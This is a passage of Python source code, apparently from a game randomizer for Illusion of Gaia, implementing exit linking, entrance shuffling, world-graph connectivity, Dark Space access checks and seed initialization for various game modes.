        When update_graph is set and the exit is graph-mapped ([5] truthy),
        the destination node is added to the origin node's connections.
        When check_connections is set (and the shuffle is coupled, or this
        is a boss exit <= 21), the matching return exits are linked too via
        a single non-recursing call. Returns True unless an exit ID is
        invalid.
        """
        if origin_exit not in self.exits:
            if print_log:
                print("ERROR: Invalid origin (link)", origin_exit)
            return False
        if dest_exit not in self.exits:
            if print_log:
                print("ERROR: Invalid destination (link)", dest_exit)
            return False
        # Warn on relinking; exits <= 21 (boss exits) are exempt.
        if print_log and self.exits[origin_exit][1] != -1 and origin_exit > 21:
            print("WARNING: Origin already linked", origin_exit)
        if print_log and self.exits[dest_exit][2] != -1 and dest_exit > 21:
            print("WARNING: Destination already linked", dest_exit)
        self.exits[origin_exit][1] = dest_exit
        self.exits[dest_exit][2] = origin_exit
        self.exit_log.append([origin_exit,dest_exit])
        if print_log:
            print("   Linked",self.exits[origin_exit][10], "-", self.exits[dest_exit][10])
        if update_graph and self.exits[origin_exit][5]:
            origin = self.exits[origin_exit][3]
            dest = self.exits[dest_exit][4]
            if dest not in self.graph[origin][1]:
                self.graph[origin][1].append(dest)
            self.new_connection(origin,dest)
        # Couple the return trip: link each exit's sister in the opposite direction.
        if (origin_exit <= 21 or self.entrance_shuffle != "Uncoupled") and check_connections and self.is_exit_coupled(origin_exit) and self.is_exit_coupled(dest_exit):
            new_origin = self.exits[dest_exit][0]
            new_dest = self.exits[origin_exit][0]
            if new_origin <= 21: # Boss exits
                if self.exits[new_origin][5] or new_origin in self.exits_detailed:
                    self.link_exits(new_origin, new_dest, print_log, False, update_graph)
            else:
                if self.exits[new_origin][1] != -1 or self.exits[new_dest][2] != -1:
                    if print_log:
                        print("WARNING: Return exit already linked:",new_origin,new_dest)
                else:
                    self.link_exits(new_origin, new_dest, print_log, False, update_graph)
        return True
# Unlinks two previously linked exits
def unlink_exits(self, origin_exit, dest_exit, print_log=False, check_connections=True, update_graph=True):
if origin_exit not in self.exits:
if print_log:
print("ERROR: Invalid origin (unlink)", origin_exit)
return False
if dest_exit not in self.exits:
if print_log:
print("ERROR: Invalid destination (unlink)", dest_exit)
return False
if print_log and (self.exits[origin_exit][1] != dest_exit or self.exits[dest_exit][2] != origin_exit):
if print_log:
print("WARNING: Attempted to unlink exits that are not correctly linked:", origin_exit, dest_exit)
self.exits[origin_exit][1] = -1
self.exits[dest_exit][2] = -1
for x in self.exit_log:
if x[0] == origin_exit:
self.exit_log.remove(x)
if print_log:
print(" Unlinked",self.exits[origin_exit][10], "-", self.exits[dest_exit][10])
if update_graph and self.exits[origin_exit][5]:
origin = self.exits[origin_exit][3]
dest = self.exits[dest_exit][4]
if dest in self.graph[origin][1]:
self.graph[origin][1].remove(dest)
if dest in self.graph[origin][10]:
self.graph[origin][10].remove(dest)
if self.entrance_shuffle != "Uncoupled" and check_connections and self.is_exit_coupled(origin_exit) and self.is_exit_coupled(dest_exit):
new_origin = self.exits[dest_exit][0]
new_dest = self.exits[origin_exit][0]
self.unlink_exits(new_origin, new_dest, print_log, False, update_graph)
if check_connections and update_graph:
self.update_graph(True,True,True,print_log)
return True
def print_exit_log(self,exit_log=[]):
for origin,dest in exit_log:
print(self.exits[origin][10],"-",self.exits[dest][10])
# Returns lists of origin exits and destination exits that open up new nodes
def get_open_exits(self,check_progression=False):
open_exits = [[],[]]
for node in self.graph:
if not check_progression or self.is_accessible(node):
for exit in self.graph[node][14]:
if self.exits[exit][1] == -1:
open_exits[0].append(exit)
if not check_progression or not self.is_accessible(node):
for exit in self.graph[node][15]:
if self.exits[exit][2] == -1:
open_exits[1].append(exit)
return open_exits
# Takes a list of origin and destination exits, returns a suitable match
def find_exit(self,origin_exits_ls=[],dest_exits_ls=[],print_log=False,check_direction=False,check_progression=False,check_ds_access=False,test=False):
if not origin_exits_ls:
if print_log:
print("ERROR: No accessible exits available")
return False
elif not dest_exits_ls:
if print_log:
print("ERROR: No destination exits available")
return False
origin_exits = origin_exits_ls[:]
dest_exits = dest_exits_ls[:]
done = False
quarantine_o = []
while not done and origin_exits:
origin_exit = 0
while not origin_exit and origin_exits:
origin_exit = origin_exits.pop(0)
origin = self.exits[origin_exit][3]
sister_exit = self.exits[origin_exit][0]
if self.exits[origin_exit][1] != -1 or (check_progression and not self.is_accessible(origin)):
origin_exit = 0
if not origin_exit:
if print_log:
print("ERROR: No accessible exits available")
return False
direction = self.exit_direction(origin_exit)
dest_exit = 0
quarantine_d = []
while not done and dest_exits:
try_link = False
while not dest_exit and dest_exits:
dest_exit = dest_exits.pop(0)
dest = self.exits[dest_exit][4]
if self.exits[dest_exit][2] != -1 or (check_progression and self.is_accessible(dest)):
dest_exit = 0
if not dest_exit:
if print_log:
print("ERROR: No destination exits available")
return False
direction_new = self.exit_direction(dest_exit)
if dest_exit != sister_exit and (not check_direction or direction_new == direction):
try_link = True
if self.link_exits(origin_exit,dest_exit,print_log,self.entrance_shuffle != "Uncoupled",True):
if True: # or not check_ds_access or self.check_ds_access(dest):
done = True
origin_final = origin_exit
dest_final = dest_exit
if not done:
quarantine_d.append(dest_exit)
if try_link:
self.unlink_exits(origin_exit,dest_exit,print_log,True,True)
dest_exit = 0
if not done:
quarantine_o.append(origin_exit)
dest_exits += quarantine_d
quarantine_d.clear()
if not done:
if print_log:
print("ERROR: No suitable links could be found - in quarantine:",quarantine_o)
return False
# Clean up O/D lists
origin_exits += quarantine_o
for exit in origin_exits:
if self.exits[exit][1] != -1:
origin_exits.remove(exit)
for exit in dest_exits:
if self.exits[exit][2] != -1:
dest_exits.remove(exit)
return [origin_final,dest_final,origin_exits,dest_exits]
# Check if you can access one node from another
def check_access(self,origin=-1,dest=-1,check_mutual=False,print_log=False):
if origin not in self.graph or dest not in self.graph:
return False
if self.graph[origin][7] or self.graph[dest][7]:
return False
success = False
if origin == dest or dest in self.graph[origin][10]:
success = True
to_visit = self.graph[origin][10][:]
visited = [origin]
while not success and to_visit:
node = to_visit.pop(0)
visited.append(node)
if not self.graph[node][7] and dest in self.graph[node][10]:
success = True
else:
for x in self.graph[node][10]:
if x not in to_visit+visited:
to_visit.append(x)
if not check_mutual or not success:
return success
return self.check_access(dest,origin,False,print_log)
    # Build islands, i.e. mutually-accessible nodes
    def build_islands(self,print_log=False):
        """Partition accessible graph nodes into mutually-reachable islands.

        Each island is [nodes, open origin exits, open dest exits,
        open origin logic edges, open dest logic edges]. The island that
        contains the start node (a node whose backwards list [8] includes 0)
        is returned separately: [start_island, other_islands].
        """
        islands = []
        visited = []
        start_island = []
        for node in self.graph:
            if node not in visited and self.graph[node][2]:
                to_visit = [node]
                new_nodes = []
                origin_exits = []
                dest_exits = []
                origin_logic = []
                dest_logic = []
                is_start = False
                is_island = False    # NOTE(review): set but never used
                while to_visit:
                    x = to_visit.pop(0)
                    visited.append(x)
                    new_nodes.append(x)
                    if 0 in self.graph[x][8]:
                        is_start = True
                    # Gather the island's unlinked exits ([14]/[15]) and
                    # unresolved logic edges ([12]/[13]).
                    for exit in self.graph[x][14]:
                        if self.exits[exit][1] == -1:
                            origin_exits.append(exit)
                    for exit in self.graph[x][15]:
                        if self.exits[exit][2] == -1:
                            dest_exits.append(exit)
                    for edge in self.graph[x][12]:
                        if self.logic[edge][0] == 0:
                            origin_logic.append(edge)
                    for edge in self.graph[x][13]:
                        if self.logic[edge][0] == 0:
                            dest_logic.append(edge)
                    # Grow the island only through mutually-accessible neighbors.
                    for y in self.graph[x][10]:
                        if y not in visited+to_visit:
                            if self.check_access(x,y,True,print_log):
                                to_visit.append(y)
                island = [new_nodes,origin_exits,dest_exits,origin_logic,dest_logic]
                if is_start:
                    start_island = island
                else:
                    islands.append(island)
        return [start_island,islands]
    # Entrance randomizer
    def shuffle_exits(self,print_log=False):
        """Run the entrance randomizer.

        High-level phases:
          1. Mark shuffleable exits and register them on the graph; in
             Coupled mode, pair off one-way exits first.
          2. Assume all items, then stitch the world's islands together
             through progression-respecting exit links.
          3. Guarantee Dark Space access for every accessible island.
          4. Link all remaining exits, then sanity-check for stragglers.
        Returns True on success, False if any phase cannot complete.
        """
        # Map passages and internal dungeon exits to graph and list all available exits
        one_way_exits = []
        for x in self.exits:
            if self.is_exit_coupled(x) and (not self.exits[x][3] or not self.exits[x][4]): # Map missing O/D data for coupled exits
                xprime = self.exits[x][0]
                self.exits[x][3] = self.exits[xprime][4]
                self.exits[x][4] = self.exits[xprime][3]
            if not self.exits[x][1] and (self.exits[x][5] or self.exits[x][6]) and not self.exits[x][7] and (not self.exits[x][8] or self.exits[x][9]):
                self.exits[x][1] = -1 # Mark exit for shuffling
                self.exits[x][2] = -1
                if not self.is_exit_coupled(x):
                    one_way_exits.append(x)
                self.graph[self.exits[x][3]][14].append(x)
                self.graph[self.exits[x][4]][15].append(x)
        # Preserve Mu key door link
        self.link_exits(310,310,print_log)
        # Set aside Jeweler's final exit in RJH seeds
        if self.goal == "Red Jewel Hunt":
            self.link_exits(720,720,print_log)
        # If in Coupled mode, map one_way exits first
        exit_log = []
        if self.entrance_shuffle == "Coupled":
            one_way_dest = one_way_exits[:]
            random.shuffle(one_way_dest)
            while one_way_exits:
                exit1 = one_way_exits.pop()
                exit2 = one_way_dest.pop()
                self.link_exits(exit1, exit2, print_log, False)
                exit_log.append([exit1,exit2])
            if print_log:
                print( "One-way exits mapped")
        # Assume all items and abilities
        all_items = self.list_item_pool(1) + self.list_item_pool(2)
        self.items_collected = all_items
        self.update_graph(True,True,True,print_log)
        if print_log:
            print("  Graph updated. Beginning exit shuffle...")
        # for x in self.graph:
        #     print(x,self.graph[x])
        # Build world skeleton with islands
        self.unsolve()
        island_result = self.build_islands()
        start_island = island_result[0]
        islands = island_result[1]
        islands_built = []
        traverse_result = self.traverse()
        visited = traverse_result[0]
        origin_exits = []
        for node in visited:
            origin_exits += self.graph[node][14]
        if print_log:
            # i = 0
            # for x in islands:
            #     i += 1
            #     print("Island",i,x[1],x[2])
            #     for y in x[0]:
            #         print("-",self.graph[y][5])
            print("  Assembling islands...")
        random.shuffle(islands)
        # Attach islands one at a time; constraints are relaxed in two steps
        # (drop direction matching first, then drop progression checking)
        # whenever the quarantine pool is all that remains.
        check_direction = True
        check_progression = True
        quarantine = []
        while islands:
            island = islands.pop(0)
            nodes_new = island[0]
            origin_exits_new = island[1]
            dest_exits_new = island[2]
            # if print_log:
            #     for y in nodes_new:
            #         print("-",self.graph[y][5])
            if not dest_exits_new or not origin_exits_new or self.is_accessible(nodes_new[0]):
                if print_log and False:
                    print("   NOT ELIGIBLE")
            else:
                if (check_progression and not origin_exits_new) or (self.entrance_shuffle == "Coupled" and (len(origin_exits_new) < 2 or len(dest_exits_new) < 2)):
                    quarantine.append(island)
                    # if print_log:
                    #     print("   REJECTED")
                else:
                    # if print_log:
                    #     print("   ATTEMPTING...")
                    random.shuffle(origin_exits)
                    random.shuffle(dest_exits_new)
                    result = self.find_exit(origin_exits,dest_exits_new,print_log,check_direction,True)
                    if not result:
                        quarantine.append(island)
                    else:
                        traverse_result = self.traverse(island[0])
                        visited += traverse_result[0]
                        progression_result = self.get_open_exits()
                        origin_exits = progression_result[0]
                        check_direction = True
            if not islands:
                if check_direction:
                    check_direction = False
                    islands += quarantine
                    quarantine.clear()
                elif check_progression:
                    check_progression = False
                    check_direction = True
                    islands += quarantine
                    quarantine.clear()
        if print_log:
            print("  Island construction complete")
        # Check island Dark Space access, map exits accordingly
        self.reset_progress()
        #self.initialize_ds()
        self.update_graph(True,True,True)
        island_result = self.build_islands()
        islands = island_result[1]
        islands_no_ds = []
        for island in islands:
            if self.is_accessible(island[0][0]) and not self.check_ds_access(island[0][0]):
                islands_no_ds.append(island)
        if islands_no_ds:
            if print_log:
                print("Islands with no DS access:")
                i = 0
                for x in islands_no_ds:
                    i += 1
                    print("Island",x)
                    for y in x[0]:
                        print("-",self.graph[y][5])
            # Gather destination exits in unvisited regions that DO have DS
            # access, and route each DS-less island into one of them.
            dest_exits_ds = []
            for node in self.graph:
                if node not in visited and self.check_ds_access(node):
                    for exit in self.graph[node][15]:
                        if self.exits[exit][2] == -1:
                            dest_exits_ds.append(exit)
            while islands_no_ds:
                island = islands_no_ds.pop(0)
                result = self.find_exit(island[1],dest_exits_ds,print_log,check_direction)
                if not result:
                    if print_log:
                        print("ERROR: Could not find Dark Space access")
                    return False
                else:
                    dest_exits_ds = result[3]
        if print_log:
            print("  Dark Space access check successful")
        # Clean up the rest of the exits
        self.reset_progress()
        self.update_graph(True,True,True)
        self.traverse()
        check_progression = True
        check_direction = True
        while origin_exits:
            progression_result = self.get_open_exits(check_progression)
            origin_exits = progression_result[0]
            dest_exits = progression_result[1]
            random.shuffle(origin_exits)
            random.shuffle(dest_exits)
            if origin_exits:
                result = self.find_exit(origin_exits,dest_exits,print_log,check_direction,check_progression,True,False)
                if result:
                    origin_exit = result[0]
                    dest_exit = result[1]
                    dest = self.exits[dest_exit][4]
                    self.traverse([dest])
                elif check_direction:
                    check_direction = False
                elif check_progression:
                    check_progression = False
                    check_direction = True
                    if print_log:
                        print("  Finished mapping progression exits")
                else:
                    if print_log:
                        print("WARNING: This shouldn't happen")
                    origin_exits = []
        # Quality check for missing exits
        origin_exits = []
        dest_exits = []
        for exit in self.exits:
            if self.exits[exit][1] == -1:
                if print_log:
                    print("How'd we miss this one??", self.exits[exit][10])
                origin_exits.append(exit)
            if self.exits[exit][2] == -1:
                if print_log:
                    print("This one too??", self.exits[exit][10])
                dest_exits.append(exit)
        while origin_exits:
            origin_exit = origin_exits.pop(0)
            if not dest_exits:
                if print_log:
                    print("ERROR: Entrance rando failed")
                return False
            dest_exit = dest_exits.pop(0)
            self.link_exits(origin_exit,dest_exit,print_log,self.entrance_shuffle != "Uncoupled")
        # Wrap it up
        # self.reset_progress()
        # self.update_graph(True,True,True)
        if print_log:
            print("Entrance rando successful!")
        return True
def initialize_ds(self):
# Clear DS access data from graph
for x in self.graph:
self.graph[x][4] = 0
self.graph[x][9].clear()
# Find nodes that contain Dark Spaces
pyramid_ds_id = 130 # Special case for Pyramid DS
self.ds_locations = [pyramid_ds_id]
self.ds_nodes = [self.item_locations[pyramid_ds_id][0]]
self.freedan_locations = self.ds_locations[:]
self.freedan_nodes = self.ds_nodes[:]
for x in self.item_locations:
if self.item_locations[x][1] == 2:
self.ds_locations.append(x)
self.ds_nodes.append(self.item_locations[x][0])
if not self.is_sublist(self.item_locations[x][4], [64, 65, 66]) and self.item_locations[x][3] not in [61,62,63,64,65,66]:
self.freedan_locations.append(x)
self.freedan_nodes.append(self.item_locations[x][0])
return True
    # Translates logic and exits to world graph
    def update_graph(self,update_logic=True,update_ds=True,update_exits=False,print_log=False):
        """Rebuild graph connectivity from exits, logic edges and DS data.

        Order matters: exits are translated first, then non-Freedan logic,
        then the forward/backward adjacency lists are made consistent, then
        Dark Space access is propagated, and finally Freedan-dependent logic
        (which needs the fresh DS data) is re-checked.
        """
        if print_log:
            print("Updating graph...")
        if update_exits:
            for exit in self.exits:
                if exit > 21 or self.exits[exit][5] or exit in self.exits_detailed:
                    # Check if exit has been shuffled
                    if self.exits[exit][1] > 0:
                        new_exit = self.exits[exit][1]
                    elif self.exits[exit][1] == 0:
                        new_exit = exit
                    else:
                        new_exit = -1
                    # Get exit origin
                    if new_exit > 0:
                        origin = self.exits[exit][3]
                        # Missing origin/dest data is recovered from the sister exit.
                        if not origin and self.is_exit_coupled(exit):
                            sister_exit = self.exits[exit][0]
                            origin = self.exits[sister_exit][4]
                            self.exits[exit][3] = origin
                        # Get (new) exit destination
                        if self.exits[new_exit][2] == 0 or self.exits[new_exit][2] == exit:
                            dest = self.exits[new_exit][4]
                            if not dest and self.is_exit_coupled(new_exit):
                                sister_exit = self.exits[new_exit][0]
                                dest = self.exits[sister_exit][3]
                                self.exits[new_exit][4] = dest
                            # Translate link into world graph
                            if origin and dest and (dest not in self.graph[origin][1]):
                                self.graph[origin][1].append(dest)
            if print_log:
                print("  Exits updated")
        # Update logic edges (except those requiring Freedan access)
        if update_logic:
            for edge in self.logic:
                if not self.logic[edge][3]:
                    self.check_edge(edge)
            if print_log:
                print("  Logic updated (item/abilities)")
        # Make forward ([10]) and backward ([8]) adjacency mutually consistent.
        for node in self.graph:
            for x in self.graph[node][1]:
                if x not in self.graph[node][10]:
                    self.graph[node][10].append(x)
            for y in self.graph[node][10]:
                if node not in self.graph[y][8]:
                    self.graph[y][8].append(node)
            for z in self.graph[node][8]:
                if node not in self.graph[z][10]:
                    self.graph[z][10].append(node)
        if print_log:
            print("  Graph updated")
        if update_ds:
            # Map DS access to nodes
            self.initialize_ds()
            self.update_ds_access(self.ds_nodes,1)
            for node in self.freedan_nodes:
                self.update_ds_access([node],2,[node])
            if print_log:
                print("  DS access updated")
        # Update logic requiring Freedan access
        if update_logic:
            for edge in self.logic:
                if self.logic[edge][3]:
                    self.check_edge(edge)
            if print_log:
                print("  Logic updated (DS access)")
        #for x in self.graph:
        #    print(x,self.graph[x][11],self.graph[x][5])
            #print(x,self.graph[x][4],self.graph[x][9],self.graph[x][5])
        return True
# Check whether a node's DS access data needs to be updated
def consider_ds_node(self,node,access_mode=1,ds_nodes=[]):
if access_mode == 2:
if not self.graph[node][2] or self.graph[node][7]:
return False
success = False
for x in ds_nodes:
if x not in self.graph[node][9]:
success = True
return success
if not self.graph[node][4]:
return True
return False
# Check if a node has Dark Space access
def check_ds_access(self, start_node=-1, need_freedan=False, items=[]):
if start_node not in self.graph:
return False
if not self.graph[start_node][2] or self.graph[start_node][4] == 2 or (self.graph[start_node][4] == 1 and not need_freedan):
return True
elif not items:
return False
else:
to_visit = [start_node]
visited = []
ds_access = False
while not ds_access and to_visit:
node = to_visit.pop(0)
visited.append(node)
if self.check_ds_access(node,need_freedan):
return True
else:
for edge in self.graph[node][12]:
dest = self.logic[edge][2]
if dest not in visited+to_visit and not self.logic[edge][0] and self.check_edge(edge,items,False):
to_visit.append(dest)
return False
# graph_copy = copy.deepcopy(self.graph)
# self.update_graph(False,True,False)
# result = self.check_ds_access(start_node, need_freedan)
# self.graph = graph_copy
# graph_copy = None
# return result
# Update a node's DS access data - recursive for all backwards-accessible nodes
def update_ds_access(self,nodes=[],access_mode=1,ds_nodes=[]):
if not nodes:
return True
to_visit = []
for node in nodes:
if self.graph[node][4] < access_mode:
self.graph[node][4] = access_mode
for ds_node in ds_nodes:
if ds_node not in self.graph[node][9]:
self.graph[node][9].append(ds_node)
for x in self.graph[node][8]:
if self.consider_ds_node(x,access_mode,ds_nodes):
to_visit.append(x)
return self.update_ds_access(to_visit,access_mode,ds_nodes)
# Check a logic edge to see if prerequisites have been met
def check_edge(self, edge, items=[], update_graph=True, print_log=False):
success = False
if edge not in self.logic:
if print_log:
print("WARNING: Not a valid logic ID:",edge)
return False
elif self.logic[edge][0] == -1:
return False
elif self.logic[edge][0] > 0:
success = True
req_items = []
for req in self.logic[edge][4]:
i = 0
while i < req[1]:
req_items.append(req[0])
i += 1
if self.is_sublist(self.items_collected+items, req_items) and (not self.logic[edge][3] or self.check_ds_access(self.logic[edge][1],True)):
success = True
if success and update_graph:
self.open_edge(edge)
return success
# Open a logic edge and translate results to graph
def open_edge(self, edge=-1, test=False, print_log=False):
if edge not in self.logic:
return False
if self.logic[edge][0] == -1:
if print_log:
print("WARNING: Tried to open an edge that is restricted")
return False
if not self.logic[edge][0] and not test:
self.logic[edge][0] = 1
origin = self.logic[edge][1]
dest = self.logic[edge][2]
return self.new_connection(origin,dest,test)
# Map a new connection (i.e. exit, logic) to graph
def new_connection(self, origin, dest, test=False, print_log=False):
if not test:
# To/from data
if dest not in self.graph[origin][10]:
self.graph[origin][10].append(dest)
if origin not in self.graph[dest][8]:
self.graph[dest][8].append(origin)
# Dark Space access data
if self.graph[dest][4] > self.graph[origin][4]:
self.update_ds_access([origin],self.graph[dest][4],self.graph[dest][9])
# Return list of newly-accessible nodes
if self.is_accessible(origin) and not self.is_accessible(dest):
traverse_result = self.traverse([dest],test,print_log)
return traverse_result[0]
return []
# to_visit = [dest]
# while to_visit:
# node = to_visit.pop(0)
# new_nodes.append(node)
# if not test:
# self.visit_node(node,test,print_log)
# for x in self.graph[node][10]:
# if x != node and x not in to_visit+new_nodes and not self.is_accessible(x):
# to_visit.append(x)
# return new_nodes
def restrict_edge(self, edge=-1):
try:
self.logic[edge][0] = -1
return True
except:
return False
def unrestrict_edge(self, edge=-1):
try:
self.logic[edge][0] = 0 if self.logic[edge][0] != 1 else self.logic[edge][0]
return True
except:
return False
# Initialize World parameters
    def initialize(self,print_log=False):
        """Prepare world state for randomization.

        Applies the seed's settings to the item pool, logic edges and world
        graph: per-dungeon/Kara required items, variant tweaks (glitches,
        Z3 Mode, Open Mode, Red Jewel Hunt), boss shuffle, overworld and
        entrance shuffle, random start location, and Dark Space locking
        for "Completable" logic.

        Returns True on success, False if any shuffle step fails.
        """
        # Manage required items
        if 1 in self.dungeons_req:
            self.required_items += [3, 4, 7, 8]
        if 2 in self.dungeons_req:
            self.required_items += [14]
        if 3 in self.dungeons_req:
            self.required_items += [18, 19]
        if 5 in self.dungeons_req:
            self.required_items += [38, 30, 31, 32, 33, 34, 35]
        if 6 in self.dungeons_req:
            self.required_items += [39]
        if self.kara == 1:
            self.required_items += [2, 9, 23]
        elif self.kara == 2:
            self.required_items += [11, 12, 15]
        elif self.kara == 4:
            self.required_items += [26]
        elif self.kara == 5:
            self.required_items += [28, 66]
        # Update inventory space logic: these items now occupy a slot
        if 3 in self.dungeons_req:
            self.item_pool[19][4] = True
        if 5 in self.dungeons_req:
            self.item_pool[30][4] = True
            self.item_pool[31][4] = True
            self.item_pool[32][4] = True
            self.item_pool[33][4] = True
            self.item_pool[34][4] = True
            self.item_pool[35][4] = True
            self.item_pool[38][4] = True
        # Solid Arm can only be required in Extreme
        if self.difficulty < 3:
            self.exits[21][4] = self.exits[21][3]
        # Allow glitches *********************
        if "Allow Glitches" in self.variant:
            self.graph[0][1].append(601)
            self.graph[61][1].append(62)           # Moon Tribe: No ability required
            self.graph[181][1].append(182)         # Sky Garden: Ramp glitch
            self.graph[181][1].append(184)
            self.graph[182][1].append(185)
            self.graph[222][1].append(221)         # Mu: Golem skip
            self.logic[268][4][1][1] = 0           # Ankor Wat: Earthquaker not required
            self.logic[273][4][0][1] = 0           # Ankor Wat: Glasses not required
            self.logic[274][4][0][1] = 0
            self.item_locations[124][2] = False    # Ankor Wat: Dropdown DS has abilities
            self.graph[410][1].append(411)         # Pyramid: No ability required
            self.item_locations[142][2] = False    # Pyramid: Bottom DS can have abilities
            if not self.fluteless:
                self.graph[182][1].append(183)     # Sky Garden: cage glitch
                self.item_locations[94][2] = False # Great Wall: Slider glitch
                self.graph[294][1].append(295)
        # Early Firebird
        if self.firebird:
            self.graph[0][1].append(602)
            self.unrestrict_edge(405)
        # Zelda 3 Mode
        if "Z3 Mode" in self.variant:
            # Update item pool
            self.item_pool[1][0] = 29  # Red Jewels
            self.item_pool[50][0] = 5  # HP upgrades
            self.item_pool[51][0] = 2  # DEF upgrades
            self.item_pool[52][0] = 3  # STR upgrades
            self.item_pool[55][0] = 12  # HP Pieces
        # Open Mode
        if "Open Mode" in self.variant:
            # Update graph logic: travel edges are always open (state 2)
            self.logic[30][0] = 2  # Lola's Letter
            self.logic[31][0] = 2
            self.logic[32][0] = 2
            self.logic[33][0] = 2  # Memory Melody
            self.logic[36][0] = 2  # Teapot
            self.logic[38][0] = 2  # Will
            self.logic[39][0] = 2
            self.logic[40][0] = 2  # Roast
            # Remove travel items from pool
            self.item_pool[10][0] = 0  # Large Roast
            self.item_pool[13][0] = 0  # Memory Melody
            self.item_pool[24][0] = 0  # Will
            self.item_pool[25][0] = 0  # Teapot
            self.item_pool[37][0] = 0  # Lola's Letter
            self.item_pool[6][0] += 4  # Herbs
            self.item_pool[0][0] += 1  # Nothing
        # Chaos mode -- MAY NOT NEED THIS ANYMORE
        # if self.logic_mode == "Chaos":
        #    # Add "Inaccessible" node to graph
        #    self.graph[INACCESSIBLE] = [False, [], 0, [0,0,0,b"\x00"], 0, "Inaccessible", [], False, [], [], [], [], [], [], [], []]
        #
        #    # Towns can have Freedan abilities
        #    for x in self.item_locations:
        #        if self.item_locations[x][4] == [64, 65, 66]:
        #            self.item_locations[x][4].clear()
        #
        #    Several locked Dark Spaces can have abilities
        #    ds_unlock = [74, 94, 124, 142]
        #
        #    if 1 not in self.dungeons_req:  # First DS in Inca
        #        ds_unlock.append(29)
        #    if self.kara != 1:  # DS in Underground Tunnel
        #        ds_unlock.append(19)
        #    if self.kara != 5:  # DS in Ankor Wat garden
        #        ds_unlock.append(122)
        #
        #    for x in ds_unlock:
        #        self.item_locations[x][2] = False
        # Red Jewel Hunts change the graph: all endgame edges lead to node 492
        if self.goal == "Red Jewel Hunt":
            self.logic[24][2] = 492
            self.logic[25][2] = 492
            self.logic[26][2] = 492
            self.logic[27][2] = 492
            del self.logic[406]
            del self.logic[407]
        # Change graph logic depending on Kara's location
        if self.kara == 1:
            self.unrestrict_edge(400)
            self.graph[49][6].append(20)
        elif self.kara == 2:
            self.unrestrict_edge(401)
            self.graph[150][6].append(20)
            # Change "Sam" to "Samlet"
            self.location_text[45] = b"\x63\x80\x8c\x8b\x84\xa4"
        elif self.kara == 3:
            self.unrestrict_edge(402)
            self.graph[270][6].append(20)
        elif self.kara == 4:
            self.unrestrict_edge(403)
            self.graph[345][6].append(20)
        elif self.kara == 5:
            self.unrestrict_edge(404)
            self.graph[391][6].append(20)
        # Change logic based on which dungeons are required
        # NOTE(review): logic[406] was deleted above for Red Jewel Hunt;
        # presumably self.statues is empty for that goal -- confirm,
        # otherwise this would raise KeyError.
        for x in self.statues:
            self.logic[406][4][x][1] = 1
        # Change item pool for "player choice" statue requirement variant
        if self.statue_req == StatueReq.PLAYER_CHOICE.value:
            self.item_pool[100][0] = 0
            self.item_pool[101][0] = 0
            self.item_pool[102][0] = 0
            self.item_pool[103][0] = 0
            self.item_pool[104][0] = 0
            self.item_pool[105][0] = 0
            self.item_pool[106][0] = 6
        # Incorporate item locations and logic edges into world graph
        for x in self.item_locations:
            self.graph[self.item_locations[x][0]][11].append(x)
        for y in self.logic:
            if self.logic[y][0] != -1:
                self.graph[self.logic[y][1]][12].append(y)
                self.graph[self.logic[y][2]][13].append(y)
        # Random start location
        if self.start_mode != "South Cape":
            self.start_loc = self.random_start()
            if print_log:
                print("Start location:",self.item_locations[self.start_loc][9])
        if self.start_loc == 19:  # Open Lily's door when starting in Underground Tunnel
            self.logic[62][0] = 2
        # elif self.start_loc == 30:  # Inca ramp can hardlock you -- NEW FIX MAKES THIS OBSELETE
        #    self.graph[83][1].append(82)
        elif self.start_loc == 47:  # Diamond Mine behind fences
            self.graph[131][1].append(130)
        if self.start_mode != "South Cape" or self.entrance_shuffle != "None":
            self.graph[0][1].remove(22)
            self.graph[0][1].append(self.item_locations[self.start_loc][0])
        # TEMP - grant Psycho Dash at start for fluteless seeds
        if self.fluteless:
            self.fill_item(61,self.start_loc,False,True,print_log)
        # Boss Shuffle: remap each dungeon's boss entrance/exit pair
        if "Boss Shuffle" in self.variant:
            boss_entrance_idx = [1,4,7,10,13,16,19]
            boss_exit_idx = [3,6,9,12,15,18,21]
            dungeon = 0
            if print_log:
                print("Boss order: ",self.boss_order)
            while dungeon < 7:
                boss = self.boss_order[dungeon]
                entrance_old = boss_entrance_idx[dungeon]
                entrance_new = boss_entrance_idx[boss-1]
                exit_old = boss_exit_idx[boss-1]
                exit_new = boss_exit_idx[dungeon]
                self.link_exits(entrance_old,entrance_new,print_log)
                if self.exits[exit_old][5] or exit_old in self.exits_detailed:
                    self.link_exits(exit_old,exit_new,print_log)
                dungeon += 1
        # Overworld shuffle
        if "Overworld Shuffle" in self.variant:
            if not self.shuffle_overworld(print_log):
                if print_log:
                    print("ERROR: Overworld shuffle failed")
                return False
        # Shuffle exits
        if self.entrance_shuffle != "None":
            if not self.shuffle_exits(print_log):
                if print_log:
                    print("ERROR: Entrance rando failed")
                return False
        self.reset_progress(True)
        #self.initialize_ds()
        self.update_graph(True,True,True)
        # Initialize Dark Space information
        if self.logic_mode == "Completable":
            if not self.lock_dark_spaces(print_log):
                if print_log:
                    print("ERROR: Could not lock Dark Spaces")
                return False
        return True
# Update item placement logic after abilities are placed
    def check_logic(self,location=0):
        """Update item-placement logic after abilities are placed.

        If a critical Dark Space received an ability, form changes become
        impossible there: restrict the affected logic edges and move the
        item locations that are no longer reachable onto the INACCESSIBLE
        node so they are never filled with required items.
        """
        abilities = [61, 62, 63, 64, 65, 66]
        inaccessible_ls = []
        # Check for abilities in critical Dark Spaces
        if self.item_locations[19][3] in abilities:  # Underground Tunnel
            inaccessible_ls += [17, 18]
            self.restrict_edge(63)
        if self.item_locations[29][3] in abilities:  # Inca Ruins
            inaccessible_ls += [26, 27, 30, 31, 32]
            self.restrict_edge(94)
        if (self.item_locations[46][3] in abilities and  # Diamond Mine
                self.item_locations[47][3] in abilities and
                self.item_locations[48][3] in abilities):
            self.restrict_edge(118)
        if (self.item_locations[58][3] in abilities and  # Sky Garden
                self.item_locations[59][3] in abilities and
                self.item_locations[60][3] in abilities):
            self.restrict_edge(131)
            self.restrict_edge(132)
            self.restrict_edge(144)
            self.restrict_edge(147)
            self.restrict_edge(148)
            self.restrict_edge(149)
            self.restrict_edge(150)
            self.restrict_edge(151)
        if self.item_locations[94][3] in abilities:  # Great Wall
            # Spin Dash gating: insert a synthetic node/edge for the area
            # behind the Spin Dash wall and move location 93 onto it.
            self.graph[700] = [False, [], 0, [3,15,0,b"\x00"], 0, "Great Wall - Behind Spin", [], False, [], [], [], [], [], [], [], []]
            self.logic[700] = [0, 296, 700, False, [[63, 1]]]
            self.item_locations[93][0] = 700
            self.logic[222][3] = True
